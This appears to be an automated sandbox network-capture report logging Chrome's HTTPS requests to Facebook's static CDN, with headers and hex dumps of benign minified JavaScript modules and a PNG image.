                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC5492INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 49 6e 74 6c 43 4c 44 52 4e 75 6d 62 65 72 54 79 70 65 30 33 22 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 7b 67 65 74 56 61 72 69 61 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 3d 3d 3d 30 7c 7c 61 3d 3d 3d 31 29 72 65 74 75 72 6e 20 63 28 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 22 29 2e 4e 55 4d 42 45 52 5f 4f 4e 45 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 63 28 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 73 22 29 2e 4e 55 4d 42 45 52 5f 4f 54 48 45 52 7d 7d 3b 62 3d 61 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("IntlCLDRNumberType03",["IntlVariations"],(function(a,b,c,d,e,f,g){"use strict";a={getVariation:function(a){if(a===0||a===1)return c("IntlVariations").NUMBER_ONE;else return c("IntlVariations").NUMBER_OTHER}};b=a;g["default"]=b}),98)


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                30192.168.2.449776157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC581OUTGET /rsrc.php/v3/ys/r/4zS6aBDBtHT.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC1943INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: 7SY8y7UBL6gkDv/oCq1cwQ==
                                                                                                                                                                                                                                Expires: Sat, 20 Sep 2025 09:33:05 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: 4IjvPrZZGx95erGMRzAOo6dkBurwZ+H5E55ck7dBBNAWDFwBiJnypRK4AOUD4zNR3NhptJwI1t0seQxgFu7H6g==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:19 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=95, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 9204
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC9203INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 61 6e 7a 61 69 22 2c 5b 22 63 72 3a 37 33 38 33 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 28 22 63 72 3a 37 33 38 33 22 29 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 45 76 65 6e 74 45 6d 69 74 74 65 72 57 69 74 68 56 61 6c 69 64 61 74 69 6f 6e 22 2c 5b 22 42 61 73 65 45 76 65 6e 74 45 6d 69 74 74 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 62 61 62 65 6c 48 65 6c 70 65 72 73 2e 69 6e 68 65 72 69 74 73 4c 6f 6f 73 65 28 62 2c 61 29 3b 66 75 6e 63 74 69 6f 6e 20 62 28 62 2c 63 29 7b 76 61
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("Banzai",["cr:7383"],(function(a,b,c,d,e,f,g){g["default"]=b("cr:7383")}),98);__d("EventEmitterWithValidation",["BaseEventEmitter"],(function(a,b,c,d,e,f){"use strict";a=function(a){babelHelpers.inheritsLoose(b,a);function b(b,c){va


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                31192.168.2.449775157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC581OUTGET /rsrc.php/v3/yr/r/OJuPnvrkEfZ.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC1943INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: yF/Bm975u33ArWnQvO8H2A==
                                                                                                                                                                                                                                Expires: Wed, 24 Sep 2025 18:35:25 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: LNJmrBhlS/R4HyNDN9wvMWjr8Y5AIDs+m77GNsMTNktpVS7kNXJLp78hw18hRCwaJ+ZSuT+/igi/z0nzAPI8Bw==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:19 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=95, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 2078
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC2048INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 44 65 66 65 72 72 65 64 22 2c 5b 22 50 72 6f 6d 69 73 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 67 3b 28 67 7c 7c 28 67 3d 62 28 22 50 72 6f 6d 69 73 65 22 29 29 29 2e 72 65 73 6f 6c 76 65 28 29 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 76 61 72 20 63 3d 74 68 69 73 3b 61 3d 61 7c 7c 67 7c 7c 28 67 3d 62 28 22 50 72 6f 6d 69 73 65 22 29 29 3b 74 68 69 73 2e 24 31 3d 21 31 3b 74 68 69 73 2e 24 32 3d 6e 65 77 20 61 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 2e 24 33 3d 61 2c 63 2e 24 34 3d 62 7d 29 7d 76 61 72 20 63 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("Deferred",["Promise"],(function(a,b,c,d,e,f){"use strict";var g;(g||(g=b("Promise"))).resolve();a=function(){function a(a){var c=this;a=a||g||(g=b("Promise"));this.$1=!1;this.$2=new a(function(a,b){c.$3=a,c.$4=b})}var c=a.prototype;
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC29INData Raw: 65 74 75 72 6e 20 61 7d 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b
                                                                                                                                                                                                                                Data Ascii: eturn a}g["default"]=a}),98);


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                32192.168.2.449780157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:19 UTC654OUTGET /rsrc.php/v3/yZ/r/YwPTeE82t1h.png HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://static.xx.fbcdn.net/rsrc.php/v3/yM/l/0,cross/8K9cI3nQr0j.css
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC1876INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: QyE5Q1JQF3oDPNLRd40ogw==
                                                                                                                                                                                                                                Expires: Wed, 17 Sep 2025 12:32:14 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: fgnvOh9p+qawOCt2d3iqeOe4L4GEohK3XAM47DmQW8iP49OMxfSMKojKeiru1+Dhld3egapyWlSDosykZq52Cg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:20 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 3535
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC1INData Raw: 89
                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC3534INData Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 ab 00 00 00 38 08 03 00 00 00 b5 c4 f8 c6 00 00 02 91 50 4c 54 45 47 70 4c ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                Data Ascii: PNGIHDR8PLTEGpL


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                33192.168.2.449787157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC581OUTGET /rsrc.php/v3/yM/r/7QNyOKeJP6X.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: GkBFaqN6ASU6ymlIG8mrvA==
                                                                                                                                                                                                                                Expires: Wed, 24 Sep 2025 22:45:33 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: KPuxMNBQsxQpRbVgUgCe68PiTWSq7U2wFlS0y6tvqjRi0Cv/22YIAz8SzkOVQzIDGSSW9kivWke6iwdCTtMSwg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:20 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 49907
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 4c 6f 67 69 6e 46 6f 72 6d 54 6f 67 67 6c 65 22 2c 5b 22 63 78 22 2c 22 43 53 53 22 2c 22 44 4f 4d 22 2c 22 67 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 29 7b 76 61 72 20 65 3d 63 28 22 67 65 22 29 28 22 70 61 73 73 22 29 3b 64 28 22 43 53 53 22 29 2e 68 69 64 65 28 61 29 3b 45 76 65 6e 74 2e 6c 69 73 74 65 6e 28 65 2c 22 6b 65 79 75 70 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 53 74 72 69 6e 67 28 65 2e 76 61 6c 75 65 29 3b 63 2e 6c 65 6e 67 74 68 21 3d 3d 30 3f 28 64 28 22 43 53 53 22 29 2e 73 68 6f 77 28 61 29 2c 64 28 22 43 53 53 22 29 2e
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("LoginFormToggle",["cx","CSS","DOM","ge"],(function(a,b,c,d,e,f,g,h){"use strict";function a(a,b){var e=c("ge")("pass");d("CSS").hide(a);Event.listen(e,"keyup",function(){var c=String(e.value);c.length!==0?(d("CSS").show(a),d("CSS").
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC16384INData Raw: 45 3a 37 32 30 2c 46 41 49 4c 5f 46 41 4c 53 45 5f 4e 45 47 41 54 49 56 45 3a 37 32 31 2c 41 50 50 5f 43 52 41 53 48 3a 37 32 32 2c 54 45 53 54 5f 47 49 4e 44 49 3a 37 32 33 2c 54 54 54 54 3a 37 32 34 2c 42 55 47 5f 42 41 53 48 5f 41 43 54 49 4f 4e 3a 37 32 35 2c 42 55 47 5f 42 41 53 48 5f 54 45 53 54 3a 37 32 36 2c 49 4e 49 54 5f 4d 4f 42 49 4c 45 5f 43 4f 4e 46 49 47 3a 37 32 37 2c 53 55 43 43 45 53 53 5f 57 49 54 48 5f 56 43 5f 44 49 53 41 42 4c 45 44 3a 31 30 30 38 2c 44 45 4c 45 54 45 5f 52 45 43 4f 52 44 3a 31 31 31 35 2c 4e 4f 52 4d 41 4c 5f 53 45 41 52 43 48 5f 4c 45 41 56 45 3a 31 31 37 31 2c 4d 41 57 5f 53 48 49 4d 5f 49 4e 44 45 58 45 44 44 42 5f 53 45 54 55 50 3a 31 33 33 32 2c 4d 41 57 5f 46 54 53 5f 49 4e 44 45 58 45 44 44 42 5f 53 45 54 55
                                                                                                                                                                                                                                Data Ascii: E:720,FAIL_FALSE_NEGATIVE:721,APP_CRASH:722,TEST_GINDI:723,TTTT:724,BUG_BASH_ACTION:725,BUG_BASH_TEST:726,INIT_MOBILE_CONFIG:727,SUCCESS_WITH_VC_DISABLED:1008,DELETE_RECORD:1115,NORMAL_SEARCH_LEAVE:1171,MAW_SHIM_INDEXEDDB_SETUP:1332,MAW_FTS_INDEXEDDB_SETU
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC16384INData Raw: 72 5f 69 64 3a 28 68 7c 7c 28 68 3d 64 28 22 51 50 4c 45 76 65 6e 74 22 29 29 29 2e 67 65 74 4d 61 72 6b 65 72 49 64 28 61 29 2c 61 63 74 69 6f 6e 5f 69 64 3a 35 31 2c 69 6e 73 74 61 6e 63 65 5f 69 64 3a 30 2c 73 61 6d 70 6c 65 5f 72 61 74 65 3a 6b 2c 6d 65 74 68 6f 64 3a 6d 2e 67 65 74 28 65 29 2c 64 61 5f 74 79 70 65 3a 62 2c 64 61 5f 6c 65 76 65 6c 3a 63 2c 6d 65 74 61 64 61 74 61 3a 7b 61 70 70 6c 69 63 61 74 69 6f 6e 5f 61 6e 61 6c 79 74 69 63 73 3a 7b 74 69 6d 65 5f 73 69 6e 63 65 5f 71 70 6c 5f 6d 6f 64 75 6c 65 5f 69 6e 69 74 3a 67 2d 74 68 69 73 2e 24 31 2e 6d 6f 64 75 6c 65 4c 6f 61 64 54 69 6d 65 73 74 61 6d 70 7d 7d 2c 6d 61 72 6b 65 72 5f 74 79 70 65 3a 31 2c 66 6c 61 67 73 3a 31 7d 3b 74 68 69 73 2e 24 31 33 28 6c 28 6b 2c 66 29 29 7d 3b 62
                                                                                                                                                                                                                                Data Ascii: r_id:(h||(h=d("QPLEvent"))).getMarkerId(a),action_id:51,instance_id:0,sample_rate:k,method:m.get(e),da_type:b,da_level:c,metadata:{application_analytics:{time_since_qpl_module_init:g-this.$1.moduleLoadTimestamp}},marker_type:1,flags:1};this.$13(l(k,f))};b
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC1266INData Raw: 67 69 6e 49 6e 69 74 69 61 6c 4c 6f 61 64 4c 6f 67 67 65 72 22 2c 5b 22 51 75 69 63 6b 4c 6f 67 41 63 74 69 6f 6e 54 79 70 65 22 2c 22 51 75 69 63 6b 50 65 72 66 6f 72 6d 61 6e 63 65 4c 6f 67 67 65 72 22 2c 22 52 75 6e 22 2c 22 71 70 6c 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 2c 69 3d 31 2c 6a 3d 32 3b 61 3d 7b 6f 6e 4c 6f 61 64 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 68 7c 7c 28 68 3d 63 28 22 51 75 69 63 6b 50 65 72 66 6f 72 6d 61 6e 63 65 4c 6f 67 67 65 72 22 29 29 29 2e 6d 61 72 6b 65 72 53 74 61 72 74 46 72 6f 6d 4e 61 76 53 74 61 72 74 28 63 28 22 71 70 6c 22 29 2e 5f 28 32 35 30 33 35 30 36 31 37 2c 22 32 34 34 34 22 29 2c 69 29 3b 76 61 72 20 62 3d
                                                                                                                                                                                                                                Data Ascii: ginInitialLoadLogger",["QuickLogActionType","QuickPerformanceLogger","Run","qpl"],(function(a,b,c,d,e,f,g){"use strict";var h,i=1,j=2;a={onLoad:function(a){(h||(h=c("QuickPerformanceLogger"))).markerStartFromNavStart(c("qpl")._(250350617,"2444"),i);var b=


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                34192.168.2.449782157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
